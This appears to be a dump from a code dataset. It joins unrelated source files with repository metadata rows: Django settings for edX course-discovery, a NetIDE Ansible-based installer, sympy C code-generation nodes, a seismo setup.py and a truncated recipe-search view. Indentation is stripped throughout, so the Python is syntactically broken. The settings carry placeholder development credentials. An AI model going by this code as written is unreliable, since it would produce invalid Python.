if len(depth['asks']) > 0 and len(depth["bids"]) > 0:
res = {'ask': depth['asks'][0],
'bid': depth['bids'][0]}
return res
## Abstract methods
def update_depth(self):
pass
def buy(self, price, amount):
pass
def sell(self, price, amount):
pass
| mit | 2,434,534,309,840,194,600 | 30.603175 | 90 | 0.553993 | false |
edx/course-discovery | course_discovery/settings/base.py | 1 | 21247 | import os
import platform
from logging.handlers import SysLogHandler
from os.path import abspath, dirname, join
from sys import path
from corsheaders.defaults import default_headers as corsheaders_default_headers
here = lambda *x: join(abspath(dirname(__file__)), *x)
PROJECT_ROOT = here('..')
root = lambda *x: abspath(join(abspath(PROJECT_ROOT), *x))
path.append(root('apps'))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('COURSE_DISCOVERY_SECRET_KEY', 'insecure-secret-key')
OPENEXCHANGERATES_API_KEY = None
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'dal',
'dal_select2',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
]
THIRD_PARTY_APPS = [
'release_util',
'rest_framework',
'rest_framework_swagger',
'social_django',
'waffle',
'sortedm2m',
'simple_history',
'guardian',
'dry_rest_permissions',
'compressor',
'django_filters',
'django_fsm',
'storages',
'django_comments',
'django_sites_extensions',
'taggit',
'taggit_autosuggest',
'taggit_serializer',
'solo',
'webpack_loader',
'parler',
# edx-drf-extensions
'csrf.apps.CsrfAppConfig', # Enables frontend apps to retrieve CSRF tokens.
'corsheaders',
'adminsortable2',
'xss_utils',
'algoliasearch_django',
'taxonomy',
'django_object_actions',
]
ALGOLIA = {
'APPLICATION_ID': '',
'API_KEY': '',
}
PROJECT_APPS = [
'course_discovery.apps.core',
'course_discovery.apps.ietf_language_tags',
'course_discovery.apps.api',
'course_discovery.apps.catalogs',
'course_discovery.apps.course_metadata',
'course_discovery.apps.edx_elasticsearch_dsl_extensions',
'course_discovery.apps.publisher',
'course_discovery.apps.publisher_comments',
]
ES_APPS = [
'elasticsearch_dsl',
'django_elasticsearch_dsl',
'django_elasticsearch_dsl_drf',
]
INSTALLED_APPS += THIRD_PARTY_APPS
INSTALLED_APPS += PROJECT_APPS
INSTALLED_APPS += ES_APPS
MIDDLEWARE = (
'corsheaders.middleware.CorsMiddleware',
'edx_django_utils.cache.middleware.RequestCacheMiddleware',
'edx_rest_framework_extensions.auth.jwt.middleware.JwtAuthCookieMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.contrib.sites.middleware.CurrentSiteMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'social_django.middleware.SocialAuthExceptionMiddleware',
'waffle.middleware.WaffleMiddleware',
'simple_history.middleware.HistoryRequestMiddleware',
'edx_django_utils.cache.middleware.TieredCacheMiddleware',
'edx_rest_framework_extensions.middleware.RequestMetricsMiddleware',
'edx_rest_framework_extensions.auth.jwt.middleware.EnsureJWTAuthSettingsMiddleware',
)
ROOT_URLCONF = 'course_discovery.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'course_discovery.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
# Set this value in the environment-specific files (e.g. local.py, production.py, test.py)
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.',
'NAME': 'discovery',
'USER': 'discov001',
'PASSWORD': 'password',
'HOST': 'localhost', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
'PORT': '', # Set to empty string for default.
'ATOMIC_REQUESTS': False,
},
'read_replica': {
'ENGINE': 'django.db.backends.',
'NAME': 'discovery',
'USER': 'discov001',
'PASSWORD': 'password',
'HOST': 'localhost',
'PORT': '',
'ATOMIC_REQUESTS': False,
},
}
# Internationalization
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en'
PARLER_DEFAULT_LANGUAGE_CODE = LANGUAGE_CODE
PARLER_LANGUAGES = {
1: (
{'code': LANGUAGE_CODE, },
),
'default': {
'fallbacks': [PARLER_DEFAULT_LANGUAGE_CODE],
'hide_untranslated': False,
}
}
# Parler seems to be a bit overeager with its caching of translated models,
# and so we get a large number of sets, but rarely any gets
PARLER_ENABLE_CACHING = False
# Determines whether the caching mixin in course_discovery/apps/api/cache.py is used
USE_API_CACHING = True
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LOCALE_PATHS = (
root('conf', 'locale'),
)
# MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = root('media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# END MEDIA CONFIGURATION
# STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = root('assets')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# Is this a dev environment where static files need to be explicitly added to the URL configuration?
STATIC_SERVE_EXPLICITLY = False
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
root('static'),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
COMPRESS_PRECOMPILERS = (
('text/x-scss', 'django_libsass.SassCompiler'),
)
# Minify CSS
COMPRESS_CSS_FILTERS = [
'compressor.filters.css_default.CssAbsoluteFilter',
]
WEBPACK_LOADER = {
'DEFAULT': {
'BUNDLE_DIR_NAME': 'bundles/',
'STATS_FILE': root('..', 'webpack-stats.json'),
}
}
# TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/1.8/ref/settings/#templates
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'APP_DIRS': True,
'DIRS': (
root('templates'),
),
'OPTIONS': {
'context_processors': (
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.template.context_processors.request',
'django.contrib.messages.context_processors.messages',
'course_discovery.apps.core.context_processors.core',
),
'debug': True, # Django will only display debug pages if the global DEBUG setting is set to True.
}
},
]
# END TEMPLATE CONFIGURATION
# COOKIE CONFIGURATION
# The purpose of customizing the cookie names is to avoid conflicts when
# multiple Django services are running behind the same hostname.
# Detailed information at: https://docs.djangoproject.com/en/dev/ref/settings/
SESSION_COOKIE_NAME = 'course_discovery_sessionid'
CSRF_COOKIE_NAME = 'course_discovery_csrftoken'
LANGUAGE_COOKIE_NAME = 'course_discovery_language'
# END COOKIE CONFIGURATION
# AUTHENTICATION CONFIGURATION
LOGIN_URL = '/login/'
LOGOUT_URL = '/logout/'
AUTH_USER_MODEL = 'core.User'
AUTHENTICATION_BACKENDS = (
'auth_backends.backends.EdXOAuth2',
'django.contrib.auth.backends.ModelBackend',
'guardian.backends.ObjectPermissionBackend',
)
CORS_ALLOW_CREDENTIALS = True
CORS_ALLOW_HEADERS = corsheaders_default_headers + (
'use-jwt-cookie',
)
# CORS_ORIGIN_WHITELIST is empty by default so above is not used unless the whitelist is set elsewhere
# Guardian settings
ANONYMOUS_USER_NAME = None # Do not allow anonymous user access
GUARDIAN_MONKEY_PATCH = False # Use the mixin on the User model instead of monkey-patching.
ENABLE_AUTO_AUTH = False
AUTO_AUTH_USERNAME_PREFIX = 'auto_auth_'
SOCIAL_AUTH_STRATEGY = 'auth_backends.strategies.EdxDjangoStrategy'
# Set these to the correct values for your OAuth2 provider (e.g., devstack)
SOCIAL_AUTH_EDX_OAUTH2_KEY = "discovery-sso-key"
SOCIAL_AUTH_EDX_OAUTH2_SECRET = "discovery-sso-secret"
SOCIAL_AUTH_EDX_OAUTH2_ISSUER = "http://127.0.0.1:8000"
SOCIAL_AUTH_EDX_OAUTH2_URL_ROOT = "http://127.0.0.1:8000"
SOCIAL_AUTH_EDX_OAUTH2_LOGOUT_URL = "http://127.0.0.1:8000/logout"
BACKEND_SERVICE_EDX_OAUTH2_KEY = "discovery-backend-service-key"
BACKEND_SERVICE_EDX_OAUTH2_SECRET = "discovery-backend-service-secret"
BACKEND_SERVICE_EDX_OAUTH2_PROVIDER_URL = "http://127.0.0.1:8000/oauth2"
# OAuth request timeout: either a (connect, read) tuple or a float, in seconds.
OAUTH_API_TIMEOUT = (3.05, 1)
# Request the user's permissions in the ID token
EXTRA_SCOPE = ['permissions']
# TODO Set this to another (non-staff, ideally) path.
LOGIN_REDIRECT_URL = '/admin/'
# END AUTHENTICATION CONFIGURATION
# OPENEDX-SPECIFIC CONFIGURATION
PLATFORM_NAME = 'Your Platform Name Here'
# END OPENEDX-SPECIFIC CONFIGURATION
# Set up logging for development use (logging to stdout)
level = 'DEBUG' if DEBUG else 'INFO'
hostname = platform.node().split(".")[0]
# Use a different address for Mac OS X
syslog_address = '/var/run/syslog' if platform.system().lower() == 'darwin' else '/dev/log'
syslog_format = '[service_variant=discovery][%(name)s] %(levelname)s [{hostname} %(process)d] ' \
'[%(pathname)s:%(lineno)d] - %(message)s'.format(hostname=hostname)
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(asctime)s %(levelname)s %(process)d [%(name)s] %(pathname)s:%(lineno)d - %(message)s',
},
'syslog_format': {'format': syslog_format},
},
'handlers': {
'console': {
'level': level,
'class': 'logging.StreamHandler',
'formatter': 'standard',
'stream': 'ext://sys.stdout',
},
'local': {
'level': level,
'class': 'logging.handlers.SysLogHandler',
'address': syslog_address,
'formatter': 'syslog_format',
'facility': SysLogHandler.LOG_LOCAL0,
},
},
'loggers': {
'django': {
'handlers': ['console', 'local'],
'propagate': True,
'level': 'INFO'
},
'requests': {
'handlers': ['console', 'local'],
'propagate': True,
'level': 'WARNING'
},
'factory': {
'handlers': ['console', 'local'],
'propagate': True,
'level': 'WARNING'
},
'elasticsearch': {
'handlers': ['console', 'local'],
'propagate': True,
'level': 'WARNING'
},
'urllib3': {
'handlers': ['console', 'local'],
'propagate': True,
'level': 'WARNING'
},
'django.request': {
'handlers': ['console', 'local'],
'propagate': True,
'level': 'WARNING'
},
'': {
'handlers': ['console', 'local'],
'level': 'DEBUG',
'propagate': False
},
}
}
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'edx_rest_framework_extensions.auth.jwt.authentication.JwtAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.BasicAuthentication',
),
'DEFAULT_PAGINATION_CLASS': 'course_discovery.apps.api.pagination.PageNumberPagination',
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.DjangoModelPermissions',
),
'PAGE_SIZE': 20,
'TEST_REQUEST_RENDERER_CLASSES': (
'rest_framework.renderers.MultiPartRenderer',
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_THROTTLE_CLASSES': (
'course_discovery.apps.core.throttles.OverridableUserRateThrottle',
),
'DEFAULT_THROTTLE_RATES': {
'user': '100/hour',
},
'DEFAULT_SCHEMA_CLASS': 'rest_framework.schemas.coreapi.AutoSchema'
}
# http://chibisov.github.io/drf-extensions/docs/
REST_FRAMEWORK_EXTENSIONS = {
'DEFAULT_CACHE_ERRORS': False,
'DEFAULT_CACHE_RESPONSE_TIMEOUT': None,
'DEFAULT_LIST_CACHE_KEY_FUNC': 'course_discovery.apps.api.cache.timestamped_list_key_constructor',
'DEFAULT_OBJECT_CACHE_KEY_FUNC': 'course_discovery.apps.api.cache.timestamped_object_key_constructor',
}
# NOTE (CCB): JWT_SECRET_KEY is intentionally not set here to avoid production releases with a public value.
# Set a value in a downstream settings file.
JWT_AUTH = {
'JWT_ALGORITHM': 'HS256',
'JWT_AUDIENCE': 'course-discovery',
'JWT_ISSUER': [
{
'AUDIENCE': 'SET-ME-PLEASE',
'ISSUER': 'http://127.0.0.1:8000/oauth2',
'SECRET_KEY': 'SET-ME-PLEASE'
}
],
'JWT_DECODE_HANDLER': 'edx_rest_framework_extensions.auth.jwt.decoder.jwt_decode_handler',
'JWT_VERIFY_AUDIENCE': False,
'JWT_AUTH_COOKIE': 'edx-jwt-cookie',
'JWT_PUBLIC_SIGNING_JWK_SET': None,
'JWT_AUTH_COOKIE_HEADER_PAYLOAD': 'edx-jwt-cookie-header-payload',
'JWT_AUTH_COOKIE_SIGNATURE': 'edx-jwt-cookie-signature',
'JWT_AUTH_HEADER_PREFIX': 'JWT',
}
SWAGGER_SETTINGS = {
'DOC_EXPANSION': 'list',
}
SYNONYMS_MODULE = 'course_discovery.settings.synonyms'
# Paginate the django queryset used to populate the index with the specified size
# (by default it uses the database driver's default setting)
# https://docs.djangoproject.com/en/3.1/ref/models/querysets/#iterator
# Thus set the 'chunk_size'
ELASTICSEARCH_DSL_QUERYSET_PAGINATION = 5000
# Defining default pagination for all requests to ElasticSearch,
# whose parameters 'size' and 'from' are not explicitly set.
ELASTICSEARCH_DSL_LOAD_PER_QUERY = 5000
ELASTICSEARCH_DSL = {
'default': {'hosts': '127.0.0.1:9200'}
}
ELASTICSEARCH_INDEX_NAMES = {
'course_discovery.apps.course_metadata.search_indexes.documents.course': 'course',
'course_discovery.apps.course_metadata.search_indexes.documents.course_run': 'course_run',
'course_discovery.apps.course_metadata.search_indexes.documents.person': 'person',
'course_discovery.apps.course_metadata.search_indexes.documents.program': 'program',
}
ELASTICSEARCH_DSL_INDEX_SETTINGS = {'number_of_shards': 1, 'number_of_replicas': 1}
# We do not use the RealtimeSignalProcessor here to avoid overloading our
# Elasticsearch instance when running the refresh_course_metadata command
# If you still want to use please use customized RealTimeSignalProcessor
# course_discovery.apps.course_metadata.search_indexes.signals.RealTimeSignalProcessor
ELASTICSEARCH_DSL_SIGNAL_PROCESSOR = 'django_elasticsearch_dsl.signals.BaseSignalProcessor'
ELASTICSEARCH_DSL_INDEX_RETENTION_LIMIT = 3
# Update Index Settings
# Make sure the size of the new index does not change by more than this percentage
INDEX_SIZE_CHANGE_THRESHOLD = .1
# Elasticsearch search query facet "size" option to increase from the default value of "100"
# See https://www.elastic.co/guide/en/elasticsearch/reference/7.8/search-aggregations-metrics-percentile-aggregation.html
SEARCH_FACET_LIMIT = 10000
# Precision settings for the elasticsearch cardinality aggregations used to compute distinct hit and facet counts.
# The elasticsearch cardinality aggregation is not guarenteed to produce accurate results. Accuracy is configurable via
# an optional precision_threshold setting. Cardinality aggregations for queries that produce fewer results than the
# precision threshold can be expected to be pretty accurate. Cardinality aggregations for queries that produce more
# results than the precision_threshold will be less accurate. Setting a higher value for precision_threshold requires
# a memory tradeoff of rougly precision_threshold * 8 bytes. See the elasticsearch docs for more details:
# https://www.elastic.co/guide/en/elasticsearch/reference/current/search-aggregations-metrics-cardinality-aggregation.html
#
# We use a higher value for hit precision than for facet precision for two reasons:
# 1.) The hit count is more visible to users than the facet counts.
# 2.) The performance penalty for having a higher hit precision is less than the penalty for a higher facet
# precision, since the hit count only requires a single aggregation.
DISTINCT_COUNTS_HIT_PRECISION = 1500
DISTINCT_COUNTS_FACET_PRECISION = 250
DEFAULT_PARTNER_ID = None
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
# edx-django-sites-extensions will fallback to this site if we cannot identify the site from the hostname.
SITE_ID = 1
TAGGIT_CASE_INSENSITIVE = True
# django-solo configuration (https://github.com/lazybird/django-solo#settings)
SOLO_CACHE = 'default'
SOLO_CACHE_TIMEOUT = 3600
ENABLE_PUBLISHER = False # either old (publisher djangoapp) or new (frontend-app-publisher)
PUBLISHER_FROM_EMAIL = None
USERNAME_REPLACEMENT_WORKER = "REPLACE WITH VALID USERNAME"
# If no upgrade deadline is specified for a course run seat, when the course is published the deadline will default to
# the course run end date minus the specified number of days.
PUBLISHER_UPGRADE_DEADLINE_DAYS = 10
# Django Debug Toolbar settings
# http://django-debug-toolbar.readthedocs.org/en/latest/installation.html
if os.environ.get('ENABLE_DJANGO_TOOLBAR', False):
INSTALLED_APPS += [
'debug_toolbar',
'elastic_panel',
]
MIDDLEWARE += (
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
DEBUG_TOOLBAR_PATCH_SETTINGS = False
DEBUG_TOOLBAR_PANELS = [
'debug_toolbar.panels.versions.VersionsPanel',
'debug_toolbar.panels.timer.TimerPanel',
'debug_toolbar.panels.settings.SettingsPanel',
'debug_toolbar.panels.headers.HeadersPanel',
'debug_toolbar.panels.request.RequestPanel',
'debug_toolbar.panels.sql.SQLPanel',
'debug_toolbar.panels.staticfiles.StaticFilesPanel',
'debug_toolbar.panels.templates.TemplatesPanel',
'debug_toolbar.panels.cache.CachePanel',
'debug_toolbar.panels.signals.SignalsPanel',
'debug_toolbar.panels.logging.LoggingPanel',
'debug_toolbar.panels.redirects.RedirectsPanel',
'elastic_panel.panel.ElasticDebugPanel'
]
AWS_SES_REGION_ENDPOINT = "email.us-east-1.amazonaws.com"
AWS_SES_REGION_NAME = "us-east-1"
CORS_ORIGIN_WHITELIST = []
CSRF_COOKIE_SECURE = False
ELASTICSEARCH_CLUSTER_URL = "http://127.0.0.1:9200/"
EMAIL_BACKEND = "django_ses.SESBackend"
EMAIL_HOST = "localhost"
EMAIL_HOST_PASSWORD = ""
EMAIL_HOST_USER = ""
EMAIL_PORT = 25
EMAIL_USE_TLS = False
EXTRA_APPS = []
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
STATICFILES_STORAGE = "django.contrib.staticfiles.storage.StaticFilesStorage"
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
EDX_DRF_EXTENSIONS = {
"OAUTH2_USER_INFO_URL": "http://127.0.0.1:8000/oauth2/user_info"
}
API_ROOT = None
MEDIA_STORAGE_BACKEND = {
'DEFAULT_FILE_STORAGE': 'django.core.files.storage.FileSystemStorage',
'MEDIA_ROOT': MEDIA_ROOT,
'MEDIA_URL': MEDIA_URL
}
# Settings related to the taxonomy_support
TAXONOMY_COURSE_METADATA_PROVIDER = 'course_discovery.apps.taxonomy_support.providers.DiscoveryCourseMetadataProvider'
# Settings related to the EMSI client
EMSI_API_ACCESS_TOKEN_URL = 'https://auth.emsicloud.com/connect/token'
EMSI_API_BASE_URL = 'https://emsiservices.com'
EMSI_CLIENT_ID = ''
EMSI_CLIENT_SECRET = ''
################################### BEGIN CELERY ###################################
# Message configuration
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_COMPRESSION = 'gzip'
CELERY_RESULT_COMPRESSION = 'gzip'
# Results configuration
CELERY_TASK_IGNORE_RESULT = False
CELERY_TASK_STORE_ERRORS_EVEN_IF_IGNORED = True
# Events configuration
CELERY_TASK_TRACK_STARTED = True
CELERY_WORKER_SEND_TASK_EVENTS = True
CELERY_TASK_SEND_SENT_EVENT = True
# Prevent Celery from removing handlers on the root logger. Allows setting custom logging handlers.
CELERY_WORKER_HIJACK_ROOT_LOGGER = False
CELERY_TASK_DEFAULT_EXCHANGE = 'discovery'
CELERY_TASK_DEFAULT_ROUTING_KEY = 'discovery'
CELERY_TASK_DEFAULT_QUEUE = 'discovery.default'
# Celery Broker
CELERY_BROKER_URL = os.environ.get('CELERY_BROKER_URL', '')
CELERY_TASK_ALWAYS_EAGER = False
################################### END CELERY ###################################
FIRE_UPDATE_COURSE_SKILLS_SIGNAL = False
| agpl-3.0 | -2,374,468,131,660,770,000 | 33.049679 | 122 | 0.687391 | false |
fp7-netide/Engine | loader/loader/installer.py | 1 | 8381 | """
Copyright (c) 2015, NetIDE Consortium (Create-Net (CN), Telefonica Investigacion Y Desarrollo SA (TID), Fujitsu
Technology Solutions GmbH (FTS), Thales Communications & Security SAS (THALES), Fundacion Imdea Networks (IMDEA),
Universitaet Paderborn (UPB), Intel Research & Innovation Ireland Ltd (IRIIL), Fraunhofer-Institut für
Produktionstechnologie (IPT), Telcaria Ideas SL (TELCA) )
All rights reserved. This program and the accompanying materials
are made available under the terms of the Eclipse Public License v1.0
which accompanies this distribution, and is available at
http://www.eclipse.org/legal/epl-v10.html
Authors:
Gregor Best, [email protected]
"""
import json
import logging
import os
import platform
import requests
import stat
import subprocess as sp
import sys
import tempfile
from subprocess import call
from loader import environment
from loader import util
from loader.package import Package
# XXX make this configurable
install_package_command = "sudo apt-get install --yes {}"
class InstallException(Exception): pass
def do_server_install(pkg):
logging.debug("Doing server install for '{}' now".format(pkg))
prefix = os.path.expanduser("~")
with util.TempDir("netide-server-install") as t:
p = Package(pkg, t)
if not p.load_apps_and_controller():
logging.error("There's something wrong with the package")
return 2
call(["./virtualEnv_Ansible_Install.sh"])
if "server" not in p.config:
raise InstallException('"server" section missing from configuration!')
conf = p.config["server"]
util.editPlaybookServer(conf)
if "host" in conf and platform.node() != conf["host"] and conf["host"] != "localhost":
raise InstallException("Attempted server installation on host {} (!= {})".format(platform.node(), conf["host"]))
# with open("Playbook_Setup/sever.yml", "w") as serverYml:
# serverYml.write("--- \n - name: install prereq for all hosts \n hosts: localhost \n roles: - prereq - core \n ...")
#install core and engine on server (usually localhost)
#read p.config[server] and add server to site.yml
call(["ansibleEnvironment/bin/ansible-playbook", "-v", os.path.join("Playbook_Setup", "siteServer.yml")])
#Check the rest of system requirements
logging.debug("Checking system requirements for {}".format(pkg))
if not p.check_no_hw_sysreq():
logging.error("Requirements for package {} not met".format(pkg))
return 2
def do_client_installs(pkgpath, dataroot):
"Dispatches installation requests to client machines after gaining a foothold on them. Requires passwordless SSH access to \
client machines and passwordless root via sudo on client machines"
with util.TempDir("netide-client-installs") as t:
pkg = Package(pkgpath, t)
if not pkg.load_apps_and_controller():
logging.error("There's something wrong with the package")
return 2
clients = pkg.get_clients()
#controller = pkg.controllers
#print("controller: ")
#print(controller)
#for n in controller:
# print("instance of controller: ")
# print(n)
# for i in controller[n]:
# print(i)
util.editPlaybookClient(pkg)
util.spawn_logged(["ansibleEnvironment/bin/ansible-playbook", "-v", os.path.join("Playbook_Setup", "siteClient.yml")])
#===============================================================================
# util.write_ansible_hosts(clients, os.path.join(t, "ansible-hosts"))
#
# tasks = []
#
# # Can't use `synchronize' here because that doesn't play nice with ssh options
# tasks.append({
# "name": "Copy NetIDE loader",
# "copy": {
# "dest": '{{ansible_user_dir}}/netide-loader-tmp',
# "src" : os.getcwd()}})
#
# # We need to do this dance because `copy' copies to a subdir unless
# # `src' ends with a '/', in which case it doesn't work at all (tries
# # to write to '/' instead)
# tasks.append({
# "shell": "mv {{ansible_user_dir}}/netide-loader-tmp/loader {{ansible_user_dir}}/netide-loader",
# "args": {"creates": "{{ansible_user_dir}}/netide-loader"}})
# tasks.append({"file": {"path": "{{ansible_user_dir}}/netide-loader-tmp", "state": "absent"}})
# tasks.append({"file": {"path": "{{ansible_user_dir}}/netide-loader/netideloader.py", "mode": "ugo+rx"}})
#
# tasks.append({
# "name": "Bootstrap NetIDE loader",
# "shell": "bash ./setup.sh",
# "args": { "chdir": "{{ansible_user_dir}}/netide-loader" }})
#
# #is already cloned...
# tasks.append({
# "name": "Clone IDE repository",
# "git": {
# "repo": "http://github.com/fp7-netide/IDE.git",
# "dest": "{{ansible_user_dir}}/IDE",
# "version": "development"}})
#
# #has been done in setup server
# tasks.append({
# "name": "Install Engine",
# "shell": "bash {{ansible_user_dir}}/IDE/plugins/eu.netide.configuration.launcher/scripts/install_engine.sh"})
# #add creates:
# tasks.append({
# "file": {
# "path": dataroot,
# "state": "directory"}})
#
# tasks.append({
# "name": "Register Package checksum",
# "copy": {
# "content": json.dumps({"cksum": pkg.cksum}, indent=2),
# "dest": os.path.join(dataroot, "controllers.json")}})
#
# playbook = [{"hosts": "clients", "tasks": tasks}]
#
# #use new role system here !
# for c in clients:
#
# ctasks = []
#
# apps = []
# # Collect controllers per client machine and collect applications
# for con in pkg.controllers_for_node(c[0]):
# apps.extend(con.applications)
# cname = con.__name__.lower()
# if cname not in ["ryu", "floodlight", "odl", "pox", "pyretic"]:
# raise InstallException("Don't know how to install controller {}".format(cname))
#
# script = ["{{ansible_user_dir}}", "IDE", "plugins", "eu.netide.configuration.launcher", "scripts"]
# script.append("install_{}.sh".format(cname))
#
# ctasks.append({
# "name": "install controller {}".format(cname),
# "shell": "bash {}".format(os.path.join(*script)),
# "args": {"chdir": "{{ansible_user_dir}}"}})
#
# # Install application dependencies
# # XXX: ugly :/
# # XXX: libraries
# for a in apps:
# reqs = a.metadata.get("requirements", {}).get("Software", {})
#
# # Languages
# for l in reqs.get("Languages", {}):
# if l["name"] == "python":
# if l["version"].startswith("3"):
# l["name"] += "3"
# else:
# l["name"] += "2"
# elif l["name"] == "java":
# if "7" in l["version"]:
# l["name"] = "openjdk-7-jdk"
# elif "8" in l["version"]:
# l["name"] = "openjdk-8-jdk"
# else:
# l["name"] = "openjdk-6-jdk"
#
# ctasks.append({
# "name": "install {} (for app {})".format(l["name"], str(a)),
# "apt": {"pkg": "{}={}*".format(l["name"], l["version"])}})
# playbook.append({"hosts": c[0], "tasks": ctasks})
#
# # A valid JSON-document is also valid YAML, so we can take a small shortcut here
# with open(os.path.join(t, "a-playbook.yml"), "w") as ah:
# json.dump(playbook, ah, indent=2)
# print(playbook)
# util.spawn_logged(["ansibleEnvironment/bin/ansible-playbook", "-v", "-i", os.path.join(t, "ansible-hosts"), os.path.join(t, "a-playbook.yml")])
#===============================================================================
| epl-1.0 | -2,557,839,773,706,332,700 | 41.323232 | 153 | 0.540692 | false |
wxgeo/geophar | wxgeometrie/sympy/codegen/cnodes.py | 3 | 2498 | """
AST nodes specific to the C family of languages
"""
from sympy.core.basic import Basic
from sympy.core.compatibility import string_types
from sympy.core.containers import Tuple
from sympy.core.sympify import sympify
from sympy.codegen.ast import Attribute, Declaration, Node, String, Token, Type, none, FunctionCall
void = Type('void')
restrict = Attribute('restrict') # guarantees no pointer aliasing
volatile = Attribute('volatile')
static = Attribute('static')
def alignof(arg):
""" Generate of FunctionCall instance for calling 'alignof' """
return FunctionCall('alignof', [String(arg) if isinstance(arg, string_types) else arg])
def sizeof(arg):
""" Generate of FunctionCall instance for calling 'sizeof'
Examples
========
>>> from sympy.codegen.ast import real
>>> from sympy.codegen.cnodes import sizeof
>>> from sympy.printing.ccode import ccode
>>> ccode(sizeof(real))
'sizeof(double)'
"""
return FunctionCall('sizeof', [String(arg) if isinstance(arg, string_types) else arg])
class CommaOperator(Basic):
""" Represents the comma operator in C """
def __new__(cls, *args):
return Basic.__new__(cls, *[sympify(arg) for arg in args])
class Label(String):
""" Label for use with e.g. goto statement.
Examples
========
>>> from sympy.codegen.cnodes import Label
>>> from sympy.printing.ccode import ccode
>>> print(ccode(Label('foo')))
foo:
"""
class goto(Token):
""" Represents goto in C """
__slots__ = ['label']
_construct_label = Label
class PreDecrement(Basic):
""" Represents the pre-decrement operator
Examples
========
>>> from sympy.abc import x
>>> from sympy.codegen.cnodes import PreDecrement
>>> from sympy.printing.ccode import ccode
>>> ccode(PreDecrement(x))
'--(x)'
"""
nargs = 1
class PostDecrement(Basic):
""" Represents the post-decrement operator """
nargs = 1
class PreIncrement(Basic):
""" Represents the pre-increment operator """
nargs = 1
class PostIncrement(Basic):
""" Represents the post-increment operator """
nargs = 1
class struct(Node):
""" Represents a struct in C """
__slots__ = ['name', 'declarations']
defaults = {'name': none}
_construct_name = String
@classmethod
def _construct_declarations(cls, args):
return Tuple(*[Declaration(arg) for arg in args])
class union(struct):
""" Represents a union in C """
| gpl-2.0 | 1,761,598,395,251,997,700 | 22.566038 | 99 | 0.651321 | false |
ezietsman/seismo | setup.py | 1 | 1041 | from numpy.distutils.core import Extension
f90periodogram = Extension(name='f90periodogram',
sources=['seismo/src/periodogram.f90'],
extra_f90_compile_args=["-fopenmp", "-lgomp"],
extra_link_args=["-lgomp"])
if __name__ == "__main__":
from numpy.distutils.core import setup
setup(name='seismo_blobs',
description="Compiled sources for use with seismo",
author="Ewald Zietsman",
author_email="[email protected]",
ext_modules=[f90periodogram]
)
# Now seismo
import setuptools
setuptools.setup(
name="seismo",
version="0.2",
packages=setuptools.find_packages(),
install_requires=['numpy>=1.9'],
# metadata for upload to PyPI
author="Ewald Zietsman",
author_email="[email protected]",
description="Timeseries stuff for asteroseismology",
license="MIT",
keywords="time series frequency",
)
| mit | 5,087,803,322,496,857,000 | 29.617647 | 73 | 0.580211 | false |
Anushi/inhousemenu | search_recipes/views.py | 1 | 14147 | import operator
from django.shortcuts import render
from django.http import HttpResponse
from .models import RecipeList, RecipeIngredient, RecipeContent2, IngredientList
from django.db.models import Q
import itertools
# Create your views here.
def search_recipes_form(request):
ingredients_name_list = IngredientList.objects.all()
#print ingredients_name_list
for i in ingredients_name_list:
print i.ingredient_name
return render(request, 'search_form.html',
{'ingredients_name_list': ingredients_name_list
})
def search_recipes(request):
search_list = []
search_list_temp = []
checks_list = []
split_q_nonull = []
split_q_nonull2 = []
delete_list = []
other_list = []
q2=""
ingredients_name_list = IngredientList.objects.all()
if request.method == 'GET':
if request.GET.getlist('checks[]'):
checks_list = request.GET.getlist('checks[]')
search_list_temp.extend(checks_list)
if request.GET.getlist('other'):
other_list = request.GET.getlist('other')
search_list_temp.extend(other_list)
